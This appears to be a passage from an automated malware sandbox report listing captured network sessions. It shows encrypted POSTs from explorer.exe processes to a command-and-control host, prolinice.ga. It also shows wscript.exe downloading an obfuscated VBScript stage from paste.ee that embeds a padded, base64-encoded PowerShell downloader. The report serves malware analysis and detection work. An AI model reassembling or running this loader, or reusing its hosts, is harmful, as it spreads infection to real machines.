May 27, 2024 18:35:44.883877993 CEST	224	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.883908033 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.883940935 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.883974075 CEST	448	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.884007931 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.884042978 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.884079933 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
May 27, 2024 18:35:44.889029026 CEST	1236	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.22	49176	77.232.129.190	80	1244	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:36:08.149095058 CEST	281	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aikpfjvjuwcsxfjs.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 275 Host: prolinice.ga
May 27, 2024 18:36:08.149127960 CEST	275	OUT	Data Raw: 6e e2 e2 fb b3 47 86 1f 61 1f b5 15 4b 5c fb f5 de 56 90 26 4f 89 ce ee 84 ea 7f 69 d6 48 32 04 32 c5 ea c3 7b da f7 a1 64 cf c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 65 c2 e2 ce Data Ascii: nGaK\V&OiH22{d0&7H8.6hEvRY;PLeepnai\|c 5bKJM`D9&Z_;rWAh\|qCoa\|/zW;n)~QY-u`PLG/M \n~Y\[=G
May 27, 2024 18:36:09.103879929 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 16:36:08 GMT Server: Apache/2.4.59 (Debian) Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f [TRUNCATED] Data Ascii: 52d88_'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q,3M@y+{s'Pht]SI":2.(QZ`l pbd8']0x4d8[K,\|WS}"w2bqv?OURB2hvt)U>P$\;QIzzdyW&Fv"-CL=pK@Bp^kQfsjDk$+KPPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E\| [}S2TqL L7@x!FEx{4@h;pg_Q@[N2H%s;"r21LVRvo9bN\|P,ds,^L+j m.&>g!=/r:l_UkH >(OAO\|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3\|JY=R^Xo[#kn^T-la@9>$z\|kXv6]O8Rp\|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/o [TRUNCATED]
May 27, 2024 18:36:09.103980064 CEST	1236	IN	Data Raw: d0 7e ed e5 00 cd 59 0c 72 ff c8 4d 8a 9f 4d 22 6a 89 67 05 b3 b9 2f fa 37 ad b4 05 f0 4c 9c d2 83 fb c8 40 2b ca 87 d7 d8 99 59 38 07 be e8 b3 e1 23 2a af e7 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 Data Ascii: ~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#
May 27, 2024 18:36:09.104016066 CEST	1236	IN	Data Raw: 0b c3 87 e9 a2 e5 9c 55 17 aa d8 83 31 db 94 fd c2 b3 3f 55 5c 5f 9f 1e 7e 6b 4e a8 35 a7 e0 42 a5 09 24 43 66 a8 9a a3 42 93 39 9a 14 e7 d4 3b 8a a4 a2 eb 60 3a 8d 8e cb 46 35 1a 7d f4 ef 1b d7 93 ab 25 b8 e4 a0 82 b6 86 fd 09 d8 a2 56 03 b9 bb Data Ascii: U1?U\_~kN5B$CfB9;`:F5}%VRZ8po>f)%h>E(=+d~X{?\|Ki06aKs=l?D7D;z6UM"iI"dioztH*{XgQlF}7u\C7:,#
May 27, 2024 18:36:09.104079962 CEST	672	IN	Data Raw: c8 44 aa c5 8e 2a 48 7b 58 6d b8 bd b5 19 24 5d 9b 9e c8 36 bb ab 0c dc df ea 85 53 6c af be 7d a0 6e 18 29 0f 59 52 49 76 a4 cc 87 01 d7 c4 07 89 48 4c 60 ef 84 a9 cc 3b 27 55 20 28 f5 e4 f0 78 5e 1c 8e b8 52 e9 61 ab 70 7a 85 27 8f 78 0d 7a ea Data Ascii: DH{Xm$]6Sl}n)YRIvHL`;'U (x^Rapz'xzov:?8,eXO\[ybb}Jp>0+;*8-hg=hYQIHI,%07?b{Kk'BS\kV#vBc)xB6jX`
May 27, 2024 18:36:09.104130983 CEST	1236	IN	Data Raw: 70 cf 1a 2d 33 2a 7d 8b 6e 60 43 b9 10 b7 99 ba c5 b9 e1 07 33 3a ab 49 a7 7f 0b b7 3f d0 e3 77 76 05 d4 49 4a 51 23 b0 7b 33 c9 fd 79 9a a6 18 e3 91 1b a0 6e 82 a5 b8 88 82 53 1c 14 4f 5b 01 31 e7 6d 82 e4 55 5b de a4 e2 46 ce 13 f0 19 82 6e e9 Data Ascii: p-3*}n`C3:I?wvIJQ#{3ynSO[1mU[FnD5Gu]5I446Fdhj9Aw)-?Uu^qrP0>ZWPH{{X.Dbd<N;}cHI3},[>q]Sz2[
May 27, 2024 18:36:09.104165077 CEST	224	IN	Data Raw: a2 17 85 c4 e1 84 6d 81 ae a1 1a 16 35 7a 31 ad b3 b2 ba b3 37 b4 3b ac 60 4a d9 1b 1b 97 02 d6 f4 fc f4 0b d2 e6 4a 03 d0 99 7b 04 b0 bd 92 02 09 a0 2f a4 d1 95 3f a8 66 41 38 85 7f 99 76 d6 6a 2e fa 60 6a 44 6b 4a 3b 93 59 86 b6 3a 4b 30 37 5a Data Ascii: m5z17;`JJ{/?fA8vj.`jDkJ;Y:K07ZE_gnt;;-xs3~Fw0xXdw^D3~Q-]2(-OmwIKC+<ymmCx>sH
May 27, 2024 18:36:09.104202986 CEST	1236	IN	Data Raw: 0e d0 ce 58 e7 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b 09 b2 8f c5 69 b3 e3 2e 68 db 5f 54 ac f4 4b ea f4 95 cf a6 e0 97 64 46 fa b2 4c 4e 19 30 04 78 43 d3 ff 6c 6e 19 40 99 27 48 d4 Data Ascii: XomSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:JmD9Jwx23gk>7)$YqPVpECH$H;\l=gK3c{R\Q
May 27, 2024 18:36:09.104254961 CEST	224	IN	Data Raw: 3e a7 ca e8 34 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd b9 cf 0d 84 3f d4 e3 ff 65 86 bb 51 5d 2a 36 81 2d d3 fc 54 91 22 56 f9 f4 d4 62 b0 18 c9 6c 00 f4 c6 78 56 7e 7b 79 2f 4f e9 2f Data Ascii: >48\|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScdZl"[ff
May 27, 2024 18:36:09.104289055 CEST	1236	IN	Data Raw: 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f Data Ascii: 0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[
May 27, 2024 18:36:09.104325056 CEST	1236	IN	Data Raw: 3e d4 f9 b3 b7 95 fc d2 44 f5 2d db 0a e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc 2d 16 83 7e af 9b 2b 47 23 a5 d8 d3 76 93 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a Data Ascii: >D-pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n_vULWvNzY&k:_@qfh)[\LMj8L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.22	49177	77.232.129.190	80	4072	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 18:36:17.026357889 CEST	274	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://prolinice.ga/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 1395 Host: prolinice.ga
May 27, 2024 18:36:17.026417971 CEST	1395	OUT	Data Raw: 6e e2 e2 fb b3 47 86 1f 61 1f b5 15 4b 5c fb f5 de 56 90 26 4f 89 ce ee 84 ea 7f 69 d6 48 32 04 32 c5 ea c3 7b da f7 a1 64 cf c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 5d 82 f8 a2 Data Ascii: nGaK\V&OiH22{deug]H8.6hEvRY;PL]Oc~k_!z1rJC\S7Wx>x :xGresnq~D%lu#RCIP6=I.:ua)i1b\|Fz1zO!
May 27, 2024 18:36:18.009824038 CEST	584	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 16:36:17 GMT Server: Apache/2.4.59 (Debian) Content-Length: 409 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49172	188.114.96.3	443	3420	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-27 16:35:27 UTC	302	OUT	GET /d/Bo3r4 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: paste.ee Connection: Keep-Alive
2024-05-27 16:35:27 UTC	1230	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 16:35:27 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ti0r5ZVcpkJsyVUMB4IfxItc4lOtXNQ1ZXtxi3XL8kXZI3zG3OQXnvqv5y3nz8sxkGIHqWsgCDX8LzpctszFhQbVx9pyz95XWd6QjP%2FV7QigILIZpe9rg5KBMg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a76b10882941d3-EWR alt-svc: h3=":443"; ma=86400
2024-05-27 16:35:27 UTC	139	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 70 65 72 69 6f 64 69 63 61 6d 65 6e 74 65 20 2c 20 72 65 67 75 6c 61 64 6f 72 20 2c 20 64 65 73 76 69 72 67 69 6e 69 7a 61 72 20 2c 20 70 61 73 73 61 72 69 6e 68 61 20 2c 20 6d 75 73 74 65 6c 69 6e 6f 20 2c 20 43 61 6d 61 20 2c 20 6d 75 73 74 65 6c 69 6e 6f 31 0d 0a 20 20 20 20 20 72 65 67 75 6c 61 64 6f 72 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 64 65 73 76 69 Data Ascii: 1f7f dim periodicamente , regulador , desvirginizar , passarinha , mustelino , Cama , mustelino1 regulador = " " desvi
2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 72 67 69 6e 69 7a 61 72 20 20 3d 20 22 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 Data Ascii: rginizar = "" & passarinha & regulador & passarinha & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBh
2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 72 65 42 38 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 Data Ascii: reB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & passarinha & regulador & passar
2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 73 44 67 54 72 65 63 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 Data Ascii: rekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & passarinha & regulador & passarinha & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & passarinha
2024-05-27 16:35:27 UTC	1369	IN	Data Raw: 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 4c 67 42 71 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 59 44 67 54 72 65 4d 77 44 67 54 72 65 77 44 67 54 72 65 44 63 44 67 54 72 65 4e 67 44 67 54 72 65 7a 44 67 54 72 65 44 51 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 61 73 73 61 72 69 6e 68 61 20 26 20 72 65 67 75 6c 61 64 6f 72 20 26 20 Data Ascii: eG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTre" & passarinha & regulador & passarinha & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & passarinha & regulador &
